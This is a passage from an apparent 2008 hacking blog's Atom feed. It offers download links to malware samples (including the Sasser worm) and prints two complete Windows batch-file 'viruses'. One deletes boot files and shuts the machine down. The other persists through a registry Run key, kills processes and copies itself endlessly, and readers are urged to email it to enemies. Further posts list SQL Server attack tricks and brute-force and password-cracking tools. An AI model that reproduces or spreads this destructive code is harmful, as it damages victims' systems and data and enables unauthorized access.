scheme='http://www.blogger.com/atom/ns#' term='virus coding'/><category scheme='http://www.blogger.com/atom/ns#' term='virus writing'/><title type='text'>Awesome Virus...!!</title><content type='html'>WARNING: Do NOT open this on your own computer!!&lt;br /&gt;It will disable your Firewall and do a lot of funny thing if you still want to see funy things please try it&lt;br /&gt;http://rapidshare.com/files/78696248/Smile.exe.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;It will display a msg "I love dlls" then it will flood there desktop with dll's and also the directory(s) "C:/Windows/" "C:/Windows/System32/" It also disables Ctrl+Alt+Delete in winXP.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;h@@p://rapidshare.com/files/65703684/MXZ.zip&lt;br /&gt;===================&lt;br /&gt;&lt;br /&gt;It will infect .COM or .EXE files as they are opened, executed, or their attributes are accessed. Also, if the system time is 12:00am, the virus will delete any file executed.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;h@@p://rapidshare.com/files/65703373/massacre.zip&lt;br /&gt;===================&lt;br /&gt;&lt;br /&gt;The famous worm that fucked up millions of computers around the world , started in Germany where it was programmed by an 18 year old man.&lt;br /&gt;&lt;br /&gt;h@@p://rapidshare.com/files/65700942/sasser.b.zip&lt;br /&gt;===================&lt;br /&gt;&lt;br /&gt;Plz Notify if the link is broken or is detectable..&lt;br /&gt;&lt;br /&gt;Replace @@ with tt...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/505780039999938232-2172819775198283564?l=wanna2hack.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wanna2hack.blogspot.com/feeds/2172819775198283564/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=505780039999938232&amp;postID=2172819775198283564' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/2172819775198283564'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/2172819775198283564'/><link rel='alternate' type='text/html' href='http://wanna2hack.blogspot.com/2008/04/awesome-virus.html' title='Awesome Virus...!!'/><author><name>Mohit Agrawal</name><uri>http://www.blogger.com/profile/05334898536589832297</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://bp2.blogger.com/_eniK8-MS-uk/SASwF05xcAI/AAAAAAAAACI/kMhQ2ZG4gBQ/S220/Bhai..jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-505780039999938232.post-5013917324017036749</id><published>2008-04-13T05:30:00.001-07:00</published><updated>2008-04-13T05:30:53.781-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='virus coding'/><category scheme='http://www.blogger.com/atom/ns#' term='virus writing'/><title type='text'>:::::::::::: NEXT BAT FILE VIRUS :::::::::::::::::</title><content type='html'>@echo off&lt;br /&gt;attrib -r -s -h c:\autoexec.bat&lt;br /&gt;del c:\autoexec.bat&lt;br /&gt;attrib -r -s -h c:\boot.ini&lt;br /&gt;del c:\boot.ini&lt;br /&gt;attrib -r -s -h c:\ntldr&lt;br /&gt;del c:\ntldr&lt;br /&gt;attrib -r -s -h c:\windows\win.ini&lt;br /&gt;del c:\windows\win.ini&lt;br /&gt;@echo off&lt;br /&gt;msg * YOU GOT OWNED!!!&lt;br /&gt;shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive&lt;br /&gt;&lt;br /&gt;save as bat file in notepad!!&lt;br /&gt;This will pop up a message saying OWNED!!&lt;br /&gt;and shut down the computer never to reboot again!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;type this in notepad&lt;br /&gt;&lt;br /&gt;start virus.bat&lt;br /&gt;virus.bat&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;and save as with this name&lt;br /&gt;&lt;br /&gt;virus.bat&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ur antivirus will not detect this virus&lt;br /&gt;&lt;br /&gt;Basically this program will delete all that files which are needed for booting.........&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/505780039999938232-5013917324017036749?l=wanna2hack.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wanna2hack.blogspot.com/feeds/5013917324017036749/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=505780039999938232&amp;postID=5013917324017036749' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/5013917324017036749'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/5013917324017036749'/><link rel='alternate' type='text/html' href='http://wanna2hack.blogspot.com/2008/04/next-bat-file-virus.html' title=':::::::::::: NEXT BAT FILE VIRUS :::::::::::::::::'/><author><name>Mohit Agrawal</name><uri>http://www.blogger.com/profile/05334898536589832297</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://bp2.blogger.com/_eniK8-MS-uk/SASwF05xcAI/AAAAAAAAACI/kMhQ2ZG4gBQ/S220/Bhai..jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-505780039999938232.post-2213035998161108174</id><published>2008-04-13T05:29:00.000-07:00</published><updated>2008-04-13T05:30:11.664-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='virus coding'/><category scheme='http://www.blogger.com/atom/ns#' term='virus writing'/><title type='text'>::::::::Virus &amp; Trick Centre :::::::::: BATCH FILE VIRUS</title><content type='html'>copy the below code and paste into your notepad.. then save as anyname.bat&lt;br /&gt;&lt;br /&gt;Do not click on that batch file........ Send it your enimies email...&lt;br /&gt;&lt;br /&gt;It will&lt;br /&gt;1) Copy itself into startup&lt;br /&gt;2) Copy itself over one thousand times into random spots in your computer&lt;br /&gt;3) Hide its self and all other created files&lt;br /&gt;4) Task kill MSN, Norton, Windows Explorer, Limewire.&lt;br /&gt;5) Swap the left mouse button with the right one&lt;br /&gt;6) Opens alert boxes&lt;br /&gt;7) Changes the time to 12:00 and shuts down the computer&lt;br /&gt;&lt;br /&gt;Code :-&lt;br /&gt;&lt;br /&gt;@Echo off&lt;br /&gt;color 4&lt;br /&gt;title 4&lt;br /&gt;title R.I.P&lt;br /&gt;start&lt;br /&gt;start&lt;br /&gt;start&lt;br /&gt;start calc&lt;br /&gt;copy %0 %Systemroot%\Greatgame &gt; nul&lt;br /&gt;reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ&lt;br /&gt;/d %systemroot%\Greatgame.bat /f &gt; nul&lt;br /&gt;copy %0 *.bat &gt; nul&lt;br /&gt;Attrib +r +h Greatgame.bat&lt;br /&gt;Attrib +r +h&lt;br /&gt;RUNDLL32 USER32.DLL.SwapMouseButton&lt;br /&gt;start calc&lt;br /&gt;cls&lt;br /&gt;tskill msnmsgr&lt;br /&gt;tskill LimeWire&lt;br /&gt;tskill iexplore&lt;br /&gt;tskill NMain&lt;br /&gt;start&lt;br /&gt;cls&lt;br /&gt;cd %userprofile%\desktop&lt;br /&gt;copy Greatgame.bat R.I.P.bat&lt;br /&gt;copy Greatgame.bat R.I.P.jpg&lt;br /&gt;copy Greatgame.bat R.I.P.txt&lt;br /&gt;copy Greatgame.bat R.I.P.exe&lt;br /&gt;copy Greatgame.bat R.I.P.mov&lt;br /&gt;copy Greatgame.bat FixVirus.bat&lt;br /&gt;cd %userprofile%My Documents&lt;br /&gt;copy Greatgame.bat R.I.P.bat&lt;br /&gt;copy Greatgame.bat R.I.P.jpg&lt;br /&gt;copy Greatgame.bat R.I.P.txt&lt;br /&gt;copy Greatgame.bat R.I.P.exe&lt;br /&gt;copy Greatgame.bat R.I.P.mov&lt;br /&gt;copy Greatgame.bat FixVirus.bat&lt;br /&gt;start&lt;br /&gt;start calc&lt;br /&gt;cls&lt;br /&gt;msg * R.I.P&lt;br /&gt;msg * R.I.P&lt;br /&gt;shutdown -r -t 10 -c "VIRUS DETECTED"&lt;br /&gt;start&lt;br /&gt;start&lt;br /&gt;time 12:00&lt;br /&gt;:R.I.P&lt;br /&gt;cd %usernameprofile%\desktop&lt;br /&gt;copy Greatgame.bat %random%.bat&lt;br /&gt;goto RIP&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/505780039999938232-2213035998161108174?l=wanna2hack.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wanna2hack.blogspot.com/feeds/2213035998161108174/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=505780039999938232&amp;postID=2213035998161108174' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/2213035998161108174'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/2213035998161108174'/><link rel='alternate' type='text/html' href='http://wanna2hack.blogspot.com/2008/04/virus-trick-centre-batch-file-virus.html' title='::::::::Virus &amp; Trick Centre :::::::::: BATCH FILE VIRUS'/><author><name>Mohit Agrawal</name><uri>http://www.blogger.com/profile/05334898536589832297</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://bp2.blogger.com/_eniK8-MS-uk/SASwF05xcAI/AAAAAAAAACI/kMhQ2ZG4gBQ/S220/Bhai..jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-505780039999938232.post-3885995030947679741</id><published>2008-04-13T05:24:00.001-07:00</published><updated>2008-04-13T05:25:02.878-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='hacking stories'/><title type='text'>Biggest Hacks Of All Time....!!</title><content type='html'>Early 1990s&lt;br /&gt;Kevin Mitnick, often incorrectly called by many as god of hackers, broke into the computer systems of the world's top technology and telecommunications companies Nokia, Fujitsu, Motorola, and Sun Microsystems. He was arrested by the FBI in 1995, but later released on parole in 2000. He never termed his activity hacking, instead he called it social engineering.&lt;br /&gt;&lt;br /&gt;November 2002&lt;br /&gt;Englishman Gary McKinnon was arrested in November 2002 following an accusation that he hacked into more than 90 US military computer systems in the UK. He is currently undergoing trial in a British court for a "fast-track extradition" to the US where he is a wanted man. The next hearing in the case is slated for today.&lt;br /&gt;&lt;br /&gt;1995&lt;br /&gt;Russian computer geek Vladimir Levin effected what can easily be called The Italian Job online - he was the first person to hack into a bank to extract money. Early 1995, he hacked into Citibank and robbed $10 million. Interpol arrested him in the UK in 1995, after he had transferred money to his accounts in the US, Finland, Holland, Germany and Israel.&lt;br /&gt;&lt;br /&gt;1990&lt;br /&gt;When a Los Angeles area radio station announced a contest that awarded a Porsche 944S2 for the 102nd caller, Kevin Poulsen took control of the entire city's telephone network, ensured he is the 102nd caller, and took away the Porsche beauty. He was arrested later that year and sentenced to three years in prison. He is currently a senior editor at Wired News.&lt;br /&gt;&lt;br /&gt;1983&lt;br /&gt;Kevin Poulsen again. A little-known incident when Poulsen, then just a student, hacked into Arpanet, the precursor to the Internet was hacked into. Arpanet was a global network of computers, and Poulsen took advantage of a loophole in its architecture to gain temporary control of the US-wide network. Mar 11&lt;br /&gt;1996&lt;br /&gt;US hacker Timothy Lloyd planted six lines of malicious software code in the computer network of Omega Engineering which was a prime supplier of components for NASA and the US Navy. The code allowed a "logic bomb" to explode that deleted software running Omega's ma&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/505780039999938232-3885995030947679741?l=wanna2hack.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wanna2hack.blogspot.com/feeds/3885995030947679741/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=505780039999938232&amp;postID=3885995030947679741' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/3885995030947679741'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/3885995030947679741'/><link rel='alternate' type='text/html' href='http://wanna2hack.blogspot.com/2008/04/biggest-hacks-of-all-time.html' title='Biggest Hacks Of All Time....!!'/><author><name>Mohit Agrawal</name><uri>http://www.blogger.com/profile/05334898536589832297</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://bp2.blogger.com/_eniK8-MS-uk/SASwF05xcAI/AAAAAAAAACI/kMhQ2ZG4gBQ/S220/Bhai..jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-505780039999938232.post-1342088343244580709</id><published>2008-04-13T05:22:00.000-07:00</published><updated>2008-04-13T05:23:50.317-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='sql exploitssql hacking'/><title type='text'>Top 10 tricks to exploit SQL Server Systems</title><content type='html'>Whether it is through manual poking and prodding or the use of security testing tools, malicious attackers employ a variety of tricks to break into SQL Server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server.&lt;br /&gt;&lt;br /&gt;1. Direct connections via the Internet&lt;br /&gt;&lt;br /&gt;These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield's Port Report shows just how many systems are sitting out there waiting to be attacked. I don't understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.&lt;br /&gt;&lt;br /&gt;2. Vulnerability scanning&lt;br /&gt;&lt;br /&gt;Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or the database system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assessment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.'s NGSSquirrel for SQL Server (for database-specific scanning). They're easy to use, offer the most comprehensive assessment and, in turn, provide the best results &lt;br /&gt;3. Enumerating the SQL Server Resolution Service&lt;br /&gt;&lt;br /&gt;Running on UDP port 1434, this allows you to find hidden database instances and probe deeper into the system. Chip Andrews' SQLPing v 2.5 is a great tool to use to look for SQL Server system(s) and determine version numbers (somewhat). This works even if your SQL Server instances aren't listening on the default ports. Also, a buffer overflow can occur when an overly long request for SQL Servers is sent to the broadcast address for UDP port 1434.&lt;br /&gt;&lt;br /&gt;4. Cracking SA passwords&lt;br /&gt;&lt;br /&gt;Deciphering SA passwords is also used by attackers to get into SQL Server databases. Unfortunately, in many cases, no cracking is needed since no password has been assigned (Oh, logic, where art thou?!). Yet another use for the handy-dandy SQLPing tool mentioned earlier. The commercial products AppDetective from Application Security Inc. and NGSSQLCrack from NGS Software Ltd. also have this capability.&lt;br /&gt;&lt;br /&gt;5. Direct-exploit attacks&lt;br /&gt;&lt;br /&gt;Direct attacks using tools such as Metasploit, shown in Figure 2, and its commercial equivalents (CANVAS and CORE IMPACT) are used to exploit certain vulnerabilities found during normal vulnerability scanning. This is typically the silver-bullet hack for attackers penetrating a system and performing code injection or gaining unauthorized command-line access.&lt;br /&gt;6. SQL injection&lt;br /&gt;&lt;br /&gt;SQL injection attacks are executed via front-end Web applications that don't properly validate user input. Malformed SQL queries, including SQL commands, can be inserted directly into Web URLs and return informative errors, commands being executed and more. These attacks can be carried out manually -- if you have a lot of time. Once I discover that a server has a potential SQL injection vulnerability, I prefer to perform the follow-through using an automated tool, such as SPI Dynamics' SQL Injector.&lt;br /&gt;&lt;br /&gt;7. Blind SQL injection&lt;br /&gt;&lt;br /&gt;These attacks go about exploiting Web applications and back-end SQL Servers in the same basic fashion as standard SQL injection. The big difference is that the attacker doesn't receive feedback from the Web server in the form of returned error messages. Such an attack is even slower than standard SQL injection given the guesswork involved. You need a good tool for this situation, and that's where Absinthe.&lt;br /&gt;&lt;br /&gt;8. Reverse engineering the system&lt;br /&gt;&lt;br /&gt;The reverse engineering trick looks for software exploits, memory corruption weaknesses and so on. In this sample chapter from the excellent book Exploiting Software: How to Break Code by Greg Hoglund and Gary McGraw, you'll find a discussion about reverse engineering ploys.&lt;br /&gt;&lt;br /&gt;9. Google hacks&lt;br /&gt;&lt;br /&gt;Google hacks use the extraordinary power of the Google search engine to ferret out SQL Server errors -- such as "Incorrect syntax near" -- leaking from publicly accessible systems. Several Google queries are available at Johnny Long's Google Hacking Database. (Look in the sections titled Error Messages and Files containing passwords.) Hackers use Google to find passwords, vulnerabilities in Web servers, underlying operating systems, publicly available procedures and more that they can use to further compromise a SQL Server system. Combining these queries with Web site names via Google's 'site:' operator often turns up juicy info you never imagined you could unearth.&lt;br /&gt;&lt;br /&gt;10. Perusing Web site source code&lt;br /&gt;&lt;br /&gt;Source code can also turn up information that may lead to a SQL Server break in. Specifically, developers may store SQL Server authentication information in ASP scripts to simplify the authentication process. A manual assessment or Google could uncover this information in a split second.&lt;br /&gt;&lt;br /&gt;Credits for reconciling the 10 techniques: Rani tha&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/505780039999938232-1342088343244580709?l=wanna2hack.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wanna2hack.blogspot.com/feeds/1342088343244580709/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=505780039999938232&amp;postID=1342088343244580709' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/1342088343244580709'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/1342088343244580709'/><link rel='alternate' type='text/html' href='http://wanna2hack.blogspot.com/2008/04/top-10-tricks-to-exploit-sql-server.html' title='Top 10 tricks to exploit SQL Server Systems'/><author><name>Mohit Agrawal</name><uri>http://www.blogger.com/profile/05334898536589832297</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://bp2.blogger.com/_eniK8-MS-uk/SASwF05xcAI/AAAAAAAAACI/kMhQ2ZG4gBQ/S220/Bhai..jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-505780039999938232.post-476740291893022586</id><published>2008-03-31T05:24:00.000-07:00</published><updated>2008-03-31T05:27:50.802-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='yahoo messenger'/><category scheme='http://www.blogger.com/atom/ns#' term='yahoo hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='yahoo invisible mode'/><title type='text'>Yahoo Invicible Mode Detection..Njoy..!!</title><content type='html'>Buddy Spy&lt;br /&gt;This software is 2 awesome..&lt;br /&gt;Buddy Spy is the premier program for Yahoo! Messenger status checking. With Buddy Spy you can now bypass Yahoo! Messenger's Invisible Settings with ease. With its quick and intuitive interface Buddy Spy offers you the ability to see if your friend is truly online or if they are invisible. Not only does Buddy Spy offer you online checking, but it will also tell you whether your friend is in a Chat Room or even if their Web Cam is online!&lt;br /&gt;&lt;br /&gt;"Buddy Spy is a User friendly , straight forward program , that I would have a hard time surviving without !! It helps Me stay in touch with Those that have to log in under invisible mode to keep from being bombarded with messages from Their Friends on Their list . &lt;br /&gt;&lt;br /&gt;What's new?&lt;br /&gt;New in Buddy Spy 2.2 is a Scan History, which keeps a log of all the users you have scanned. The log includes, the user name, online status, webcam status, chat room status, date and time, in an easy to read format. Also new in this version of Buddy Spy, is the Web Check. The web check is a new scanning method that will detect online presence, even if they are not using Yahoo! Messenger. &lt;br /&gt;Download it from here &lt;br /&gt;http://www.buddy-spy.com/files/BuddySpySetup.exe&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;---------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;U can also chek yahoo invisible mode thru website &lt;span style="font-weight:bold;"&gt;http://www.xeeber.com&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/505780039999938232-476740291893022586?l=wanna2hack.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wanna2hack.blogspot.com/feeds/476740291893022586/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=505780039999938232&amp;postID=476740291893022586' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/476740291893022586'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/476740291893022586'/><link rel='alternate' type='text/html' href='http://wanna2hack.blogspot.com/2008/03/yahoo-invicible-mode-detectionnjoy.html' title='Yahoo Invicible Mode Detection..Njoy..!!'/><author><name>Mohit Agrawal</name><uri>http://www.blogger.com/profile/05334898536589832297</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://bp2.blogger.com/_eniK8-MS-uk/SASwF05xcAI/AAAAAAAAACI/kMhQ2ZG4gBQ/S220/Bhai..jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-505780039999938232.post-7308842285573039725</id><published>2008-03-20T07:14:00.001-07:00</published><updated>2008-03-22T04:51:55.848-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='netbus'/><category scheme='http://www.blogger.com/atom/ns#' term='brutus'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking software'/><category scheme='http://www.blogger.com/atom/ns#' term='bruteforce'/><title type='text'>Bruteforcing Programs</title><content type='html'>Bruteforcing Programs check dis out...&lt;br /&gt;&lt;br /&gt;Accessdiver (AD) by Jean Fages&lt;br /&gt;CODE&lt;br /&gt;http://www.accessdiver.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Sentry by Sentinel:&lt;br /&gt;CODE&lt;br /&gt;http://sentinel.deny.de/sentry.php&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Goldeneye by Madmax&lt;br /&gt;CODE&lt;br /&gt;http://madmax.securibox.net/products/goldeneye/goldeneye.htm&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Form@ (specifically for FORM sites) by SSS -&lt;br /&gt;CODE&lt;br /&gt;http://sss.deny.de/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;httpbugger By Ken78x (specifically for form sites and httpS form sites)&lt;br /&gt;CODE&lt;br /&gt;http://ken78x.securibox.net/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Caecus by Sentinel (For form sites that require an OCR [t4wsentry.pl])&lt;br /&gt;CODE&lt;br /&gt;http://sentinel.deny.de/Caecus.php&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ares by Gamoaa -&lt;br /&gt;CODE&lt;br /&gt;[content suppressed]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Brutus&lt;br /&gt;CODE&lt;br /&gt;http://www.hoobie.net/brutus/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;AuthForce by Zachary P. Landau&lt;br /&gt;CODE&lt;br /&gt;http://kapheine.hypa.net/authforce/index.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Entry by Sparkleware&lt;br /&gt;CODE&lt;br /&gt;http://www.sparkleware.com/entry/index.html &lt;br /&gt;&lt;br /&gt;Xavior By LithiumSoft&lt;br /&gt;CODE&lt;br /&gt;http://www.btinternet.com/%7Elithiumsoft/Products.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Web Password Checker (WPC) .1 For UNIX by g1soft&lt;br /&gt;CODE&lt;br /&gt;http://www.securityfocus.com/tools/885/scoreit&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Munga Bunga's http Brute Forcer by Munga Bunga&lt;br /&gt;CODE&lt;br /&gt;[content suppressed]&lt;br /&gt;&lt;br /&gt;Wordlist Tools&lt;br /&gt;&lt;br /&gt;Raptor 3 by Madmax&lt;br /&gt;CODE&lt;br /&gt;http://madmax.securibox.net/products/raptor/raptor.htm&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Staph by Ashes&lt;br /&gt;CODE&lt;br /&gt;available at securibox.net under "downloads"&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Words Extractor&lt;br /&gt;CODE&lt;br /&gt;http://www.intellitamper.com/wordsextractor/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Parsley by on_a_role_again&lt;br /&gt;CODE&lt;br /&gt;http://www.geocities.com/parsley_home/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Lucifer by Rhino -&lt;br /&gt;CODE&lt;br /&gt;http://rhino.deny.de/lucifer.php&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ALS_novice by Wolfman -&lt;br /&gt;CODE&lt;br /&gt;http://wolfman.deny.de/tools.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Combomania by Gamoaa:&lt;br /&gt;CODE&lt;br /&gt;available at securibox.net under "downloads"&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Z-leecher by Beda&lt;br /&gt;CODE&lt;br /&gt;http://goldmaster.webpark.cz/sleech.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;S-Generator by Beda&lt;br /&gt;CODE&lt;br /&gt;http://goldmaster.webpark.cz/sgen.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;S-WordlistTool by Beda&lt;br /&gt;CODE&lt;br /&gt;http://goldmaster.webpark.cz/swordt.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Proxy Tools&lt;br /&gt;&lt;br /&gt;Proxyrama By Gaamoa&lt;br /&gt;CODE&lt;br /&gt;http://gaamoa.deny.de/&lt;br /&gt;&lt;br /&gt;Charon by Rhino&lt;br /&gt;CODE&lt;br /&gt;http://www.icefortress.com/hosts/rhino/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Advanced Proxy Leecher (APL) by Sentinel&lt;br /&gt;CODE&lt;br /&gt;http://sentinel.deny.de/apl.htm&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Geowhere by Jean Fages (NOT-Freeware) -&lt;br /&gt;CODE&lt;br /&gt;http://www.geowhere.net/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Proxy List Filter -&lt;br /&gt;CODE&lt;br /&gt;http://www.freeproxy.ru/en/programs/proxy_filter.htm&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;AATools by Glocksoft&lt;br /&gt;CODE&lt;br /&gt;http://www.glocksoft.com/aatools.htm&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Proxy Checker by Hell Labs&lt;br /&gt;CODE&lt;br /&gt;http://www.helllabs.com.ua/labs.php?&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Proxy Bag&lt;br /&gt;CODE&lt;br /&gt;http://www.intellitamper.com/proxybag/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;S-Proxy Tool by Beda&lt;br /&gt;CODE&lt;br /&gt;http://goldmaster.webpark.cz/sproxy.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Decrypting Tools&lt;br /&gt;&lt;br /&gt;John The Ripper (JTR) -&lt;br /&gt;CODE&lt;br /&gt;http://www.openwall.com/john/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;MDcrack (MD5 Cracker) -&lt;br /&gt;CODE&lt;br /&gt;http://membres.lycos.fr/mdcrack/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Passwords Pro (MD5/MD4/Pass Generator)&lt;br /&gt;CODE&lt;br /&gt;[content suppressed]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;RainbowCrack Hash Cracker&lt;br /&gt;CODE&lt;br /&gt;http://www.antsight.com/zsl/rainbowcrack/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Distributed John The Ripper by Luis Parravicini&lt;br /&gt;CODE&lt;br /&gt;http://ktulu.com.ar/en/djohn.php&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Cain and Abel by Massimiliano Montoro&lt;br /&gt;CODE&lt;br /&gt;http://www.oxid.it/cain.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Salt Grinder by Wolfman&lt;br /&gt;CODE&lt;br /&gt;http://wolfman.deny.de/SaltGrinder.php&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Log Tools&lt;br /&gt;&lt;br /&gt;LogRip by Rhino -&lt;br /&gt;CODE&lt;br /&gt;http://rhino.deny.de/logrip.php&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Azarius by Rhino -&lt;br /&gt;CODE&lt;br /&gt;http://rhino.deny.de/azarius.php&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Zimapass Parser by Sentinel:&lt;br /&gt;CODE&lt;br /&gt;http://sentinel.deny.de/zimaparser.htm&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;C-Parse (ccbill.log parser) by Sentinel:&lt;br /&gt;CODE&lt;br /&gt;http://sentinel.deny.de/c_parse.htm&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;CCBill USI (CCBILL log parser that removes all dead account PRIOR to decrypting)&lt;br /&gt;CODE&lt;br /&gt;http://membres.lycos.fr/ccbill/&lt;br /&gt;&lt;br /&gt;&lt;br 